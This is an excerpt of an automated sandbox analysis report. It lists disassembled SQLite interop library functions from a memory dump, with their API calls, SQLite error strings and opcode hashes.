                                                                                      • Instruction ID: 7c571fcefed7888a91e99f469a43158990340e16abd73a7dbc0e9a47122dbd9c
                                                                                      • Opcode Fuzzy Hash: 73337400274256fc3b2ed8d05f0019b396b0b61fdf732599b72ba164185b4382
                                                                                      • Instruction Fuzzy Hash: 9E21E771F00A146BFB10DF699884E5AF7B8EF41719F29816AD805E7B41DB30E94487D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4028B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(PRAGMA %Q.data_version,?,00000000,?,?,?,?,6C3FADCF,?,FFFFFFFF), ref: 6C4028E1
                                                                                        • Part of subcall function 6C4033C0: SIfc350ae509dc2b53.SQLITE.INTEROP(6C4004E7,?,?,?,6C4004E7,00000000,?,?,?,00000000,?,?,?,?,00000000,?), ref: 6C4033F3
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,00000000,?,?,?,?,6C3FADCF,?,FFFFFFFF), ref: 6C402909
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(00000000,00000000,?,?,?,6C3FADCF,?,FFFFFFFF), ref: 6C40291B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I9c6d7cd7b7d38055.If8364af380546f2d.Ifc350ae509dc2b53.
                                                                                      • String ID: PRAGMA %Q.data_version
                                                                                      • API String ID: 3850015490-2870853266
                                                                                      • Opcode ID: dd51e9643d93b7249e5561d1a66a85441bcc47800a68f90b71c5ed7a6993fdca
                                                                                      • Instruction ID: 5350be830d3724141e15a342c3e674199ce94662b3f60810d31e4025dd99aadb
                                                                                      • Opcode Fuzzy Hash: dd51e9643d93b7249e5561d1a66a85441bcc47800a68f90b71c5ed7a6993fdca
                                                                                      • Instruction Fuzzy Hash: EE215372B056059BC700DF59ED81D5AF7E5FB88219F14463AE91CD2B50E732E828C7D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C418C60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00033EDA,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C418D08
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C418D01
                                                                                      • database corruption, xrefs: 6C418CFC
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C418CF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 9b62aa3e658f25fa37bacfa883ba0a9ec2ec61da56f3f261412ab369b53ef5dc
                                                                                      • Instruction ID: 05d57b74d46443d66dbc3d0560b21fc2e674e2944943f6aca6a6c54eb5eb4ff2
                                                                                      • Opcode Fuzzy Hash: 9b62aa3e658f25fa37bacfa883ba0a9ec2ec61da56f3f261412ab369b53ef5dc
                                                                                      • Instruction Fuzzy Hash: 00110A32A0511867DB10DF59DC40FBAF765EF8021AF2141ABED18E7F41E732AA15C6D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002902E,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C44817C
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C448175
                                                                                      • misuse, xrefs: 6C448170
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C448166
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 0409a3540eb132b002054fb4d4f8da9cf39652748c2f0f253816e1bdac0e3b49
                                                                                      • Instruction ID: 17e53f469e7d1a463894dcbde3dc5dd26cc7e509cef2ef6c6664fe53caa61d04
                                                                                      • Opcode Fuzzy Hash: 0409a3540eb132b002054fb4d4f8da9cf39652748c2f0f253816e1bdac0e3b49
                                                                                      • Instruction Fuzzy Hash: DC1138727001549BFB04DA799C84D67739AEFC526A7388637ED19CBF45EB31E80182D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CEB50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0000F124,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,6C4CE99C,?), ref: 6C4CEC03
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4CEBFC
                                                                                      • database corruption, xrefs: 6C4CEBF7
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4CEBED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 1a8f4dd49bdf14d5ea6f777aec38acdb608f6a7b2558820c11a7ce0f787cc821
                                                                                      • Instruction ID: 9d92410d5748f7f0dfb0ddb303bce5535510aae246905f9dd5442aed1b100709
                                                                                      • Opcode Fuzzy Hash: 1a8f4dd49bdf14d5ea6f777aec38acdb608f6a7b2558820c11a7ce0f787cc821
                                                                                      • Instruction Fuzzy Hash: 00210576B00215ABE710DA5CDC82FFE77B4EB54319F00053AE815DBB91E771A91482D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C6600 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011517,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C4C5D44,?,6C4C62DB,?,00000000,?), ref: 6C4C66A3
                                                                                        • Part of subcall function 6C4C98F0: SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010983,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?), ref: 6C4C991F
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4C669C
                                                                                      • database corruption, xrefs: 6C4C6697
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4C668D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: c0b7a6f41e3fc417b895f77b94ac2f602fd5f05d7877471dff7d57914f53de52
                                                                                      • Instruction ID: c3382123c31d09fe50711a4adda87b1e22dd2feaade2d4427728f4beed5a34cc
                                                                                      • Opcode Fuzzy Hash: c0b7a6f41e3fc417b895f77b94ac2f602fd5f05d7877471dff7d57914f53de52
                                                                                      • Instruction Fuzzy Hash: E2210579704B509AC324CE28D880EB7F7F5EF49215B10459DE99AC3B42E621E941C7E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4B4B00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014F4C,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40E333,00000001,00000004), ref: 6C4B4B25
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4B4B1E
                                                                                      • misuse, xrefs: 6C4B4B19
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4B4B0F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 64da8f3829dfcbe06b9625a815b86683dd11b13f166e8b37fef52f599cf4a928
                                                                                      • Instruction ID: 99fa69640e8c906f76899d763cf6348d193ae480c1e673b69d36d2367e0f44f3
                                                                                      • Opcode Fuzzy Hash: 64da8f3829dfcbe06b9625a815b86683dd11b13f166e8b37fef52f599cf4a928
                                                                                      • Instruction Fuzzy Hash: 74112971A051045BDB04DB689884FAABBA8AF4425AF05017EF909E7B41EB31D815C6F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448A00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028EA5,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C448A2A
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C448A23
                                                                                      • misuse, xrefs: 6C448A1E
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C448A14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: ba311ef9f31a3e7ef0eba07a89f051eaf1304db63103ff96ff30ffdb83e313da
                                                                                      • Instruction ID: e85ee783740b93edbaf201aed20fe495e67b18e477dc10c5c0cae3258d17bc13
                                                                                      • Opcode Fuzzy Hash: ba311ef9f31a3e7ef0eba07a89f051eaf1304db63103ff96ff30ffdb83e313da
                                                                                      • Instruction Fuzzy Hash: AA11E6317007449FFB10DB29EC89E1777A8EB8061DF15882AE909D7F01D760E80587E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4E4D10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000057E3,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EA95,00000000,?,?,?), ref: 6C4E4DBB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 3516040d2ce57fd554ea24d53b8f70a5588435b7f2f26f5059258ef6eeae84cb
                                                                                      • Instruction ID: a150e9a40b08bff507ab24e7144f71174c09cb4cd053fc4d5908c676499a524c
                                                                                      • Opcode Fuzzy Hash: 3516040d2ce57fd554ea24d53b8f70a5588435b7f2f26f5059258ef6eeae84cb
                                                                                      • Instruction Fuzzy Hash: E61127B2706655ABEF00CF88EC49F563B64EB8A35FF064569E9189BB40C372E800C7D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41E310 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w",00000000,6C4F7DBC,?,?,?,?,?,?,?,?,?,?), ref: 6C41E35A
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F9D90,?,?,?,?,?,6C41E0C3,?,?), ref: 6C41E38D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.
                                                                                      • String ID: OR $%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w"
                                                                                      • API String ID: 962285590-3447757330
                                                                                      • Opcode ID: 385e47b8b9254d1ef9924055e19c6a3cc24514c688395ac7c8aaef3c08eaa27c
                                                                                      • Instruction ID: a1e60818b6912bf0f375f3465262d51e20d1242d7b0ef8ebffb14832134438a3
                                                                                      • Opcode Fuzzy Hash: 385e47b8b9254d1ef9924055e19c6a3cc24514c688395ac7c8aaef3c08eaa27c
                                                                                      • Instruction Fuzzy Hash: D511CE7AB041486BDB10CE89EC80EAEBBA9EBC5215F104169FD48D7B00D671ED4287E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CA9B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001066C,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,?,6C4C82A5,00000000,6C4C801E,?,00000000), ref: 6C4CAA06
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4CA9FF
                                                                                      • database corruption, xrefs: 6C4CA9FA
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4CA9F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 57fb64c006f1465df389db58a206ade6359b7c2524c7c2702a823b0cd20aa9d4
                                                                                      • Instruction ID: 9dbdff515fc43e38996306b2232ab0caab3b239065cb6590d7b84b5743a54c4f
                                                                                      • Opcode Fuzzy Hash: 57fb64c006f1465df389db58a206ade6359b7c2524c7c2702a823b0cd20aa9d4
                                                                                      • Instruction Fuzzy Hash: 5011047AB00108ABCB10DF94DD81EBEB3B8EF88319F14446AED08A7751E272D941C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4E25F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00005F42,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,00000000,?,6C4D87D3,6C511960,00000001,?,6C4E27AC,?,?,6C44931E), ref: 6C4E261F
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4E2618
                                                                                      • misuse, xrefs: 6C4E2613
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4E2609
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 8e3f982ce7da50d40d1fdb1f23eebc3bae7ee8b708d811bacb8045ddb151b74c
                                                                                      • Instruction ID: 21645fd80cdd51ded405884b4c21b2f5d52283f9e6653cb4ada39d9e2cb979bb
                                                                                      • Opcode Fuzzy Hash: 8e3f982ce7da50d40d1fdb1f23eebc3bae7ee8b708d811bacb8045ddb151b74c
                                                                                      • Instruction Fuzzy Hash: 44115971A011175BDA11DB219C0DF5A7734AF8931BF0B4239EC1856F02DB21D0128BC9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4645F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00023552,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,?,6C3EA457,?,6C5024A8,6C511A78,00000000), ref: 6C464671
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C46466A
                                                                                      • misuse, xrefs: 6C464665
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C46465B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 2d0a775425832714eb66c1b5c2a077524eabdb1f882f02dad24d5d9a16d15b82
                                                                                      • Instruction ID: 5d3c7ce6d7b874807889c3082a9415b7ea1889f1f806a24b556de0c449ccfe28
                                                                                      • Opcode Fuzzy Hash: 2d0a775425832714eb66c1b5c2a077524eabdb1f882f02dad24d5d9a16d15b82
                                                                                      • Instruction Fuzzy Hash: 3501687170064457EF08DA2BAC18F5B77569FC0AAEF04403DF92E87F41DA74E81582D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EC940 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(JSON path error near '%q',00000000,?,00000000,?,6C3EB69C,00000000,?), ref: 6C3EC981
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF), ref: 6C3EC9AB
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C3EC9BD
                                                                                      Strings
                                                                                      • JSON path error near '%q', xrefs: 6C3EC97C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
